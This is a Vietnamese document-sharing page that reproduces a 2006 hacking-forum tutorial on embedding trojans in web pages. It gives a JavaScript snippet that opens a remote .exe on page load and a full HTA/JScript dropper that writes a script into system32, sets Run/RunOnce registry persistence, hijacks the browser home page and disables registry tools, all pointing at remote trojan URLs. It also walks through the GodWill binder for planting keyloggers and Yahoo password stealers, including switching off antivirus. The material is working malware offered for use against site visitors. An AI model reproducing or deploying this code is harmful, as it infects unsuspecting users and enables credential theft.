intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Kỹ thuật gắn trojan vào html

Chia sẻ: Anhba Ba | Ngày: | Loại File: DOC | Số trang:7

222
lượt xem
49
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Chào các bạn ! vấn đề gắn trojan vào HTML là một vấn đề khá là khó và có rất nhiều cách để gắn.... Hôm nay kimdung xin hướng dẫn các bạn sử dụng 3 cách mà kimdung đã làm rồi và rất thành công..kimdung sẽ hướng dẫn cụ thể ha.

Chủ đề:
Lưu

Nội dung Text: Kỹ thuật gắn trojan vào html

  1. View Full Version: .:Kỹ thuật Gắn trojan vào html:. TrongTam1987 > Kho Virut - Trojan - Hack > .:Kỹ thuật Gắn trojan vào html:. Title: .:Kỹ thuật Gắn trojan vào html:. admin - January 18, 2006 12:37 PM (GMT) Chào các bạn ! vấn đề gắn trojan vào HTML là một vấn đề khá là khó và có r ất nhiều cách để gắn.... Hôm nay kimdung xin hướng dẫn các bạn sử dụng 3 cách mà kimdung đã làm rồi và rất thành công..kimdung sẽ hướng dẫn cụ thể ha. cách 1 : dùng một đoạn mã đơn giản để open 1 con trojan ! nh ư chiến d ịch c ủa chúng ta ! đoạn mã như sau: Code: open("http://freewebs.com/nhutuanweb/thanks.exe"); với đoạn mã này bạn gắn dưới thẻ body thì mỗi khi truy cập website nó sẽ tự open con trojan của bạn. cách này là cách thông thường nhưng cũng khá hiệu quả...hi ểu quả nh ư th ế nào thì anh em chiến dich biết rồi đó.kimdung đã mã hóa vậy mà ông boyvnx nhà ta vẫn View được thế mới hay chứ...hii cách thứ 2 là cách rất cao cấp ...kimdung thực sự không muốn hướng dẫn các bạn cách này đâu vì nó khá là nguy hiểm...nhưng mà không sao là anh em trên diễn đàn thì học hỏi là chính... bạn copy vào notepad đoạn mã sau: Code: try { var fso = new ActiveXObject("Scripting.FileSystemObject"); var Shell = new ActiveXObject("WScript.Shell"); var tfolder2 = fso.GetSpecialFolder(0);
  2. var filepath2 = tfolder2 + "\\system32\\System.js"; var a2 = fso.CreateTextFile(filepath2, true); a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";'); a2.WriteLine('var burl = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";'); a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");'); a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);'); a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";'); a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\RunOnce\\\\Windows",filepath);'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Run\\\\System32",filepath);'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hac kervn.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn. exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn. exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn. exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn. exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn. exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn. exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn. exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackerv n.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackerv
  3. n.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
  4. tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Policies\\\\System\\\\DisableRegistryTools",1,"REG_DWORD");'); a2.Close(); Shell.Run(filepath2); } catch (e){} rồi save lại với tên là : hackervn.hta nhớ là thay đường dẫn của con trojan đi nha.. (http://www.freewebs.com/hinhanhlop18/hackervn.exe) là con trojan c ủa kimdung. sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng c ủa website của bạn:
  5. Code: ]]> rồi sau đó bạn upload file hackervn.hta + với website c ủa bạn lên cùng 1 host ...ok mỗi lần mở website của bạn con trojan sẽ tự open vào trong h ệ th ống mà không hề bị phát hiện+ thêm nó set homepage luôn cho ch ắc ăn... cách này rất hay...và cao cấp. cách thứ 3 là các bạn dùng chương trình gắn trojan vào html: đó là GodWill1.06 chương trình này mình thấy nói rất nhiều trên các diễn đàn nhưng mà chẳng có ai làm được cả...hình như là copy ở site ra thôi. kimdung sẽ hướng dẫn kỹ ha. các bạn downlaod tại đây http://www.freewebs.com/trangchulop18/GodWill1.6.rar ...nếu không down được thì các bạn lên google tìm nha.file kimdung upload lên g ồm cả file h ỗ tr ợ n ữa nên nó khoảng 1.3Mb. nào bạn hãy tắt các trương trình di ệt virus đi dể chúng ta setup sau khi down về giải nén sẽ có các file sau như hình sau: nhấn kép vào file GODWILL sẽ có hình sau: sau khi bạn đọc xong những điều khoản thì nhấn enter. rồi đến đây bắt đầu xuất hiện những tiện ích của con trojan này. cái chúng ta quan tâm ở đây là html còn những tiện ich khác thì kimdung s ẽ nói
  6. sau. ok nhấn vào chữ HTML: đến đây các bạn nhấn: Genral Options để chúng ta bắt đầu tạo. vì đặc điểm của con này là nó chỉ cho gắn một con trojan khoảng 34Kb thôi nên chúng ta tìm những con trojan nào dưới 34Kb như con MYSPY hay con K2PS hay con hackpass mới nhất mà kimdung post đó yjaked1 + ở mục enter .exe fie bạn mở con trojan đã chuẩn bị trước ra (MYSPY hay con K2PS,yjaked1...) chọn đường dẫn tới nó. + ở mục enter.html bạn chọn đường dẫn cho trang web mình cần gắn trojan. + không nhắp chọn Uer defult page + ở mục enter.output bạn đổi tên file Geebferh.html thành tên nào b ạn mu ốn.vì sau khi tạo xong thì trang web có gắn trojan sẽ là tên đó ( b ạn không được m ở trang đó ra) + page ICQ notyfi bạn muốn nhấp chọn cũng được nếu bạn có số ICQ thì nhấn chọn để mỗi khi có người open trang web nó sẽ báo về ICQ cho b ạn...như kimdung thì chọn hết ngoại trừ "Uer defult page" rồi xong sau khi đã hoàn thành các bước giờ thì bạn nhấn DOVE được r ồi. rồi nhấn GEN để hoàn thành ...Godwill sẽ gắn con trojan c ủa bạn vào trang web của bạn và nó sẽ tự hoạt động mỗi khi có người mở trang web đó ra. trojan k2sp là keylogger. MYSPY là một loại gián điệp yjaked1 dùng để hack pass yahoo. kimdung viết bài này các bạn đừng nghĩ xấu kimdung ha !!!! và cũng đừng sợ kimdung dùng những điều này nhé...trước đây thì có dùng nhiều ! nh ưng gi ờ thì thôi rồi....chia sẽ cho anh em....hiiiiii
  7. chúc anh em thành công. Hosted for free by InvisionFree
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2